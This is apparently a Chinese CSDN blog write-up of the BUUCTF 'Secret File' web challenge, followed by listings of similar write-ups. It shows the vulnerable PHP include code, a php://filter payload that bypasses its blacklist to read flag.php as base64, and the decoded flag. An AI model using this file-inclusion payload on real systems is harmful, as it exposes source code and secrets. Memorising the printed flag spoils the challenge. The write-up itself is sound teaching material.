【BUUCTF】[极客大挑战 2019] Secret File Writeup

最新推荐文章于 2024-04-26 20:34:17 发布
最新推荐文章于 2024-04-26 20:34:17 发布
阅读量706 收藏 1
点赞数 1
分类专栏: Web安全 文章标签: php thinkphp ctf 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vanarrow/article/details/108176672
版权

0x00 知识点

没有过滤file,接受GET参数file,不能出现tp,input,data

使用php的file伪协议去读取文件:

?file=php://filter/convert.base64-encode/resource=flag.php

0x01 解题过程

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

/Archive_room.php

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

/flag.php

在这里插入图片描述

/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

在这里插入图片描述

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>
PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7ZWZjNGNjODYtNTY2Yi00YzczLTk2ZjctODg2M2U2NjI2MGQ3fSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=
  • base64解密
    在这里插入图片描述

flag{efc4cc86-566b-4c73-96f7-8863e66260d7}

你们这样一点都不可耐
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[极客挑战 2019]Secret File 1解题思路及BurpSuite教程
qq_24594197的博客
04-28 3598
网页跳的快让你看不到怎么办?使用BurpSuite就好了,软件放这里:链接,提取码:kmwc,教程 浏览器代理配置随便放一个:IE,chorme,火狐代理设置,设置完成后打卡burpsuite软件,第一次用这个软件,看来网上很多教程写的很简单,什么抓包,右键 —> Send to Repeater,但是小白的我试了半天才搞懂,特意写下来给那些小白看,到结合这道题讲讲,F12查看源代码 在网址后面加上Archive_room.php,提示看不清? 使用工具BurpSuite,点击下图jar包即可,先看看
BUUCTF -[极客挑战 2019]Secret File1 write up
m0_62851980的博客
04-09 1765
打开靶机,老规矩f12查看代码信息: 我们注意到有:/Archive room.php,带到网址里尝试访问,得到第二个网页: 点一下按钮,但是第三个网页告诉我们没看清,说明网页出现的时间很短, 提示回去看看,我们就返回第二个页面f12查看源码时发现 有一个名为/action.php的网址,我们进行在这个页面进行bp抓包后右键发送给Reapter,在GET处修改为action.php : 点击发送,发现一个被注释掉的网址:secr3t.php 我们在网址处输入查...
BUUCTF[极客挑战 2019]PHP1题解
最新发布
cxm4545的博客
04-26 618
想要得到flag,必须满足username===admin,password==100,于是我们就要绕过__wakeup()函数了。(Value是代码运行结果,这里要注意改一下参数个数以绕过__wakeup()函数)(1)进入靶机,我们看到网页提示:备份网站,这时候我们就应该想到有可能源码泄露了。很明显,用get传参,然后反序列化,其实这里就是一个反序列化的题目了。(5)在class.php中,我们观察一下这个Name类。(2)因此,写一个python脚本,扫描一下这个网站。(7)我们写一下代码。
[BUUOOJ][极客挑战 2019]Secret File
Y4tacker的博客
07-29 7303
首先打开页面时这个样子 源码中发现关键php文件 继续看 继续 发现文件包含漏洞 传入的file经过了一些过滤,但是没有过滤filter,我们可以用php://fileter来获取文件。构造url?file=php://filter/convert.base64-encode/resource=flag.php ...
BUU-[极客挑战 2019]Secret File
MateSnake的博客
03-14 4463
BUU-[极客挑战 2019]Secret File
[极客挑战 2019]Secret File
hao2580的博客
05-03 1931
应该有隐藏信息。查看源代码,观察发现 点开Archive_room.php,绝密档案~ 然后 button 界面是 /end.php 应该是/action.php 显示的时间很短,用burpsuite 拦截 先看一下flag.php 啥也没有? 再康康文件包含漏洞知识-PHP伪协议。应该是传入的file经过了过滤,但是没有过滤filter 构造url ?file=php://filte...
CTFShow-周末大挑战parse-url篇Writeup
05-19
这篇Writeup主要涉及的是CTF(Capture The Flag)挑战中的Web安全领域,特别是URL解析漏洞的利用。CTF是一项网络安全竞赛,参与者通过解谜、破解密码等方式获取“国旗”(Flag),在这里指的是挑战的答案或关键信息...
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
2019美亚杯writeup
03-26
本资源摘要信息来自2019美亚杯writeup,内容涉及电子数据取证大赛的相关检材和试题等。电子数据取证大赛是一项测试电子数据取证和分析能力的比赛,参赛者需要对提供的镜像文件进行分析,回答相关问题。 本资源摘要...
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup 是一篇关于网络安全竞赛的总结,主要涉及的是在Codefest'19夺旗比赛中的几个挑战解决方案。CTF(Capture The Flag)是一种流行的安全竞赛,参赛者通过解决各种安全相关的谜题来获取“旗帜...
2019.4 DDCTF web题--滴 writeup
04-14
这篇writeup涉及的是2019年4月的DDCTF(web)竞赛中的第一道题目——滴。这是一道关于Web安全和编码解码的挑战。让我们深入解析这个过程。 首先,URL `...
web-[极客挑战 2019]Secret File
wojiushilsy的博客
04-19 942
题目要点题目内容解题 题目要点 PHP伪协议 题目内容 解题 打开页面,F12查看源码,发现一个新页面。访问一下 点一下跳到另一个页面 拦截,发现 访问secr3t.php,发现一段源码 <html> <title>secret</title> <meta charset="UTF-8"> <?php hi...
[极客挑战 2019]Secret File 1(php伪协议)
m0_74119193的博客
11-13 1634
小白第一篇题解,有些地方可能还不清楚,或者存在错误,大佬们如果看到可以指点一下(●'◡'●)
[极客挑战 2019]Secret File&文件包含常用伪协议以及姿势
m0_68074153的博客
07-28 607
[极客挑战 2019]Secret File&文件包含常用伪协议以及姿势
Secret File
weixin_46580614的博客
07-16 156
打开之后的界面是 审查元素 之后有个跳转页面 直接跳转 然后 真狗 继续跳转 结果没看明白 尝试bp抓包试一下 发现 有东西 看到代码 进行分析 <html> <title>secret</title> <meta charset="UTF-8"> <?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(
极客挑战2019 Secret File
BlueDoorZz的博客
07-11 330
0x00 题目类型:文件包含,php伪协议。 0x01 查看源代码,发现Archive_room.php,点进去看看。 点击SECRET按钮,发现有个页面一闪而过,而后重定向到了end.php,退回去用burp抓包。 访问secr3t.php,发现源码。 <html> <title>secret</title> <meta charset="UTF-8"> <?php highlight_file(__FIL
2019 ISCC CTF挑战:代码审计解密PHP脚本
2019年信息安全挑战大会(ISCC)的CTF安全比赛中,有一道相对简单的题目,题目名为"2019ISCC writeup"。这道题目属于代码审计类别,主要考察参赛者对PHP函数的理解和利用,特别是涉及到的缺陷或特性分析。挑战者需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值